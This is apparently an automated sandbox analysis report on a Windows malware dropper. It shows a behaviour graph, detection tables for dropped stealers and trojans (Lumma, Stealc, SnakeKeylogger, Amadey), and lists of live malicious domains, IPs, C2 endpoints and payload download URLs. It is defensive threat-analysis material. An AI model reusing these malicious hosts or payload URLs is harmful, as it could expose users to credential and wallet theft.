Win32_VideoController, often done to detect virtual machines) 35->171 173 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 35->173 175 Creates multiple autostart registry keys 35->175 183 2 other signatures 35->183 50 RegAsm.exe 35->50         started        52 svchost015.exe 35->52         started        54 RegAsm.exe 35->54         started        56 8 other processes 35->56 file10 signatures11 process12 dnsIp13 87 C:\Users\user\AppData\...\qKLAD7yUjj.exe, PE32 37->87 dropped 89 C:\Users\user\AppData\...\hjhTHr6fWy.exe, PE32 37->89 dropped 185 LummaC encrypted strings found 37->185 58 hjhTHr6fWy.exe 37->58         started        62 qKLAD7yUjj.exe 37->62         started        139 95.179.250.45, 26212, 49714 AS-CHOOPAUS Netherlands 43->139 187 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->187 189 Installs new ROOT certificates 43->189 191 Found many strings related to Crypto-Wallets (likely being stolen) 43->191 193 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 43->193 91 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 48->91 dropped 93 C:\Users\user\AppData\...\unins000.exe (copy), PE32 48->93 dropped 95 C:\Users\user\AppData\Local\...\is-4OQD3.tmp, PE32 48->95 dropped 97 15 other files (7 malicious) 48->97 dropped 64 fidovideorecorder32_64.exe 48->64         started        141 89.105.223.196 NOVOSERVE-GMBH-ASFrankfurtGermanyNL Netherlands 50->141 195 Tries to steal Crypto Currency Wallets 50->195 143 91.202.233.158 M247GB Russian Federation 52->143 145 ballotnwu.site 104.21.2.13 CLOUDFLARENETUS United States 54->145 147 gutterydhowi.shop 104.21.4.136 CLOUDFLARENETUS United States 54->147 149 5 other IPs or domains 54->149 67 WerFault.exe 56->67         started        file14 signatures15 process16 dnsIp17 137 65.21.18.51, 45580, 49719 CP-ASDE United States 58->137 213 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 58->213 215 Found many strings related to Crypto-Wallets (likely being stolen) 58->215 217 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 58->217 219 Tries to steal Crypto Currency Wallets 58->219 69 C:\...Book JS Plugin 9.26.47.exe, PE32 64->69 dropped file18 signatures19

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  file.exe57%VirustotalBrowse
                                  file.exe100%AviraTR/Crypt.TPM.Gen
                                  file.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe100%Joe Sandbox ML
                                  C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exe100%Joe Sandbox ML
                                  C:\ProgramData\freebl3.dll0%ReversingLabs
                                  C:\ProgramData\mozglue.dll0%ReversingLabs
                                  C:\ProgramData\msvcp140.dll0%ReversingLabs
                                  C:\ProgramData\nss3.dll0%ReversingLabs
                                  C:\ProgramData\softokn3.dll0%ReversingLabs
                                  C:\ProgramData\vcruntime140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe96%ReversingLabsWin32.Trojan.Multiverze
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe88%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe33%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exe68%ReversingLabsByteCode-MSIL.Trojan.Amadey
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LummaC222222[1].exe66%ReversingLabsWin32.Spyware.Lummastealer
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe50%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stories[1].exe11%ReversingLabsWin32.Trojan.Munp
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\crypted[1].exe96%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exe14%ReversingLabsWin64.Trojan.SpywareX
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\rstxdhuj[1].exe92%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe76%ReversingLabsWin32.Trojan.Stealerc
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cccc2[1].exe79%ReversingLabsWin32.Trojan.Jalapeno
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exe100%ReversingLabsByteCode-MSIL.Trojan.Seraph
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  fragnantbui.shop0%VirustotalBrowse
                                  gutterydhowi.shop0%VirustotalBrowse
                                  google.com0%VirustotalBrowse
                                  offensivedzvju.shop0%VirustotalBrowse
                                  youtube.com0%VirustotalBrowse
                                  drawzhotdog.shop0%VirustotalBrowse
                                  steamcommunity.com0%VirustotalBrowse
                                  youtube-ui.l.google.com0%VirustotalBrowse
                                  stogeneratmns.shop0%VirustotalBrowse
                                  www.youtube.com0%VirustotalBrowse
                                  reinforcenh.shop0%VirustotalBrowse
                                  ballotnwu.site8%VirustotalBrowse
                                  www.google.com0%VirustotalBrowse
                                  vozmeatillu.shop0%VirustotalBrowse
                                  ghostreedmnu.shop0%VirustotalBrowse
                                  SourceDetectionScannerLabelLink
                                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                  http://www.innosetup.com/0%URL Reputationsafe
                                  https://api.ip.sb/ip0%URL Reputationsafe
                                  https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                                  http://ocsp.sectigo.com00%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%Avira URL Cloudsafe
                                  http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q0%Avira URL Cloudsafe
                                  lootebarrkeyn.shop100%Avira URL Cloudmalware
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%Avira URL Cloudsafe
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                                  lootebarrkeyn.shop16%VirustotalBrowse
                                  http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q0%VirustotalBrowse
                                  http://185.215.113.26/Dem7kTu/index.phpWindows0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%VirustotalBrowse
                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text1%VirustotalBrowse
                                  http://tempuri.org/0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id23ResponseD1%VirustotalBrowse
                                  http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id12Response2%VirustotalBrowse
                                  http://www.x-ways.net/winhex/subscribe-d.htmlU0%Avira URL Cloudsafe
                                  stogeneratmns.shop100%Avira URL Cloudmalware
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%VirustotalBrowse
                                  http://www.x-ways.net/winhex/subscribe-d.htmlU1%VirustotalBrowse
                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id6ResponseD0%Avira URL Cloudsafe
                                  http://tempuri.org/0%VirustotalBrowse
                                  http://tempuri.org/Entity/Id21Response4%VirustotalBrowse
                                  stogeneratmns.shop0%VirustotalBrowse
                                  http://185.215.113.26/Dem7kTu/index.phpjavapath;C:0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id2Response2%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%Avira URL Cloudsafe
                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%VirustotalBrowse
                                  http://91.202.233.158/100%Avira URL Cloudmalware
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%Avira URL Cloudsafe
                                  http://185.215.113.26/rage.Streams.DataWriter0%Avira URL Cloudsafe
                                  https://reinforcenh.shop/api100%Avira URL Cloudmalware
                                  http://tempuri.org/Entity/Id6ResponseD1%VirustotalBrowse
                                  http://185.215.113.117/inc/needmoney.exeu5n0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%Avira URL Cloudsafe
                                  http://91.202.233.158/e96ea2db21fa9a1b.php100%Avira URL Cloudmalware
                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%Avira URL Cloudsafe
                                  http://91.202.233.158/20%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%VirustotalBrowse
                                  https://reinforcenh.shop/api16%VirustotalBrowse
                                  http://www.x-ways.net/order.html-d.htmlS0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id13ResponseD0%Avira URL Cloudsafe
                                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat0%Avira URL Cloudsafe
                                  http://www.x-ways.net/order.html-d.htmlS1%VirustotalBrowse
                                  http://91.202.233.158/e96ea2db21fa9a1b.php22%VirustotalBrowse
                                  http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id13ResponseD1%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%VirustotalBrowse
                                  http://tempuri.org/Entity/Id15Response2%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%Avira URL Cloudsafe
                                  https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection0%Avira URL Cloudsafe
                                  http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp90%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%VirustotalBrowse
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%VirustotalBrowse
                                  http://185.215.113.16/inc/rstxdhuj.exez&100%Avira URL Cloudphishing
                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline0%Avira URL Cloudsafe
                                  https://discord.com/api/v9/users/0%VirustotalBrowse
                                  http://crl.ver)0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%VirustotalBrowse
                                  https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection1%VirustotalBrowse
                                  http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHD100%Avira URL Cloudmalware
                                  http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%Avira URL Cloudsafe
                                  fragnantbui.shop100%Avira URL Cloudmalware
                                  http://185.215.113.17/2fb6c2cc8dce150a.php3100%Avira URL Cloudmalware
                                  http://tempuri.org/Entity/Id21ResponseD0%Avira URL Cloudsafe
                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%VirustotalBrowse
                                  http://185.215.113.17/2fb6c2cc8dce150a.php4100%Avira URL Cloudmalware
                                  http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJa100%Avira URL Cloudmalware
                                  offensivedzvju.shop100%Avira URL Cloudmalware
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  fragnantbui.shop
                                  188.114.97.3
                                  truetrueunknown
                                  gutterydhowi.shop
                                  104.21.4.136
                                  truetrueunknown
                                  google.com
                                  142.250.186.174
                                  truefalseunknown
                                  offensivedzvju.shop
                                  188.114.96.3
                                  truetrueunknown
                                  drawzhotdog.shop
                                  172.67.162.108
                                  truetrueunknown
                                  ghostreedmnu.shop
                                  188.114.97.3
                                  truetrueunknown
                                  ballotnwu.site
                                  104.21.2.13
                                  truetrueunknown
                                  youtube.com
                                  142.250.181.238
                                  truefalseunknown
                                  youtube-ui.l.google.com
                                  216.58.212.174
                                  truefalseunknown
                                  steamcommunity.com
                                  104.102.49.254
                                  truefalseunknown
                                  stogeneratmns.shop
                                  188.114.96.3
                                  truetrueunknown
                                  reinforcenh.shop
                                  172.67.208.139
                                  truetrueunknown
                                  www.google.com
                                  216.58.206.68
                                  truefalseunknown
                                  vozmeatillu.shop
                                  188.114.96.3
                                  truetrueunknown
                                  www.youtube.com
                                  unknown
                                  unknownfalseunknown
                                  NameMaliciousAntivirus DetectionReputation
                                  lootebarrkeyn.shoptrue
                                  • 16%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  stogeneratmns.shoptrue
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.202.233.158/true
                                  • 20%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://reinforcenh.shop/apitrue
                                  • 16%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.202.233.158/e96ea2db21fa9a1b.phptrue
                                  • 22%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://steamcommunity.com/profiles/76561199724331900true
                                  • URL Reputation: malware
                                  unknown
                                  fragnantbui.shoptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  offensivedzvju.shoptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  188.190.10.161true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.17/f1ddeb6592c03206/sqlite3.dlltrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/chrome_newtabstealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Qneedmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/Dem7kTu/index.phpWindowsHkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.x-ways.net/winhex/subscribe-d.htmlUneedmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id6ResponseDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/Dem7kTu/index.phpjavapath;C:Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.26/rage.Streams.DataWriterHkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://185.215.113.117/inc/needmoney.exeu5naxplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.x-ways.net/order.html-d.htmlSneedmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://tempuri.org/Entity/Id13ResponseDRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://discord.com/api/v9/users/penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
